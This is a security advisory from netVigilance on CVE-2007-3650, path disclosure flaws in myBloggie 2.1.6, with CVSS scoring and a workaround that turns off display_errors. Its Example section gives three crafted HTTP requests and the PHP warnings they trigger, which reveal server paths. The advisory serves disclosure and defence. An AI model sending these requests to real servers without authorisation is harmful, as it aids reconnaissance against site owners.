|
Best Security Research |
|
» | netVigilance is an active contributor to nvd.nist.gov
|
» | Every vulnerability in our database is independently scored according to CVSS 2.0
|
» | Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
|
» |
netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
|
» | Our Professional Services team will validate any vulnerability Scoring for you.
|
Fact: More than 15 vulnerabilities were discovered EVERY day of 2009
Description:
myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in
any webservers.
Security problems in the product allow attackers to gather the true path of the server-side script.
External References:
Mitre CVE: CVE-2007-3650
NVD NIST: CVE-2007-3650
Summary:
myBloggie is weblog system built using PHP & mySQL, web's most popular scripting language & database system which enable myBloggie to be installed in any web server.
Release Date:
June 30 2008
Severity:
Risk: Medium
Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS Base Score: 5.0
Target Distribution on Internet: Low
Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated
SecureScout Testcase ID:
TC 17970
Vulnerable Systems:
myBloggie version 2.1.6
Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.
Vendor:
myWebland
Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.
Workaround:
Disable warning messages: modify in the php.ini file following line:
display_errors = Off.
Example:
Path Disclosure Vulnerability 1:
REQUEST:
(PHP <5.0.0 and Windows Hosting are required)
http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000
REPLY:
...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28
Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28
...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44
Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44
...
Path Disclosure Vulnerability 2:
REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/common.php
REPLY:
...
Warning: preg_replace(): Empty regular expression in [DISCLOSED PATH][PRODUCT DIRECTORY]\common.php on line 79
...
Path Disclosure Vulnerability 3:
REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login
REPLY:
...
Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH][PRODUCT DIRECTORY]\login.php on line 39
...
Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com
Copyright©2004-2011, netVigilance, Inc. All rights reserved • Privacy Policy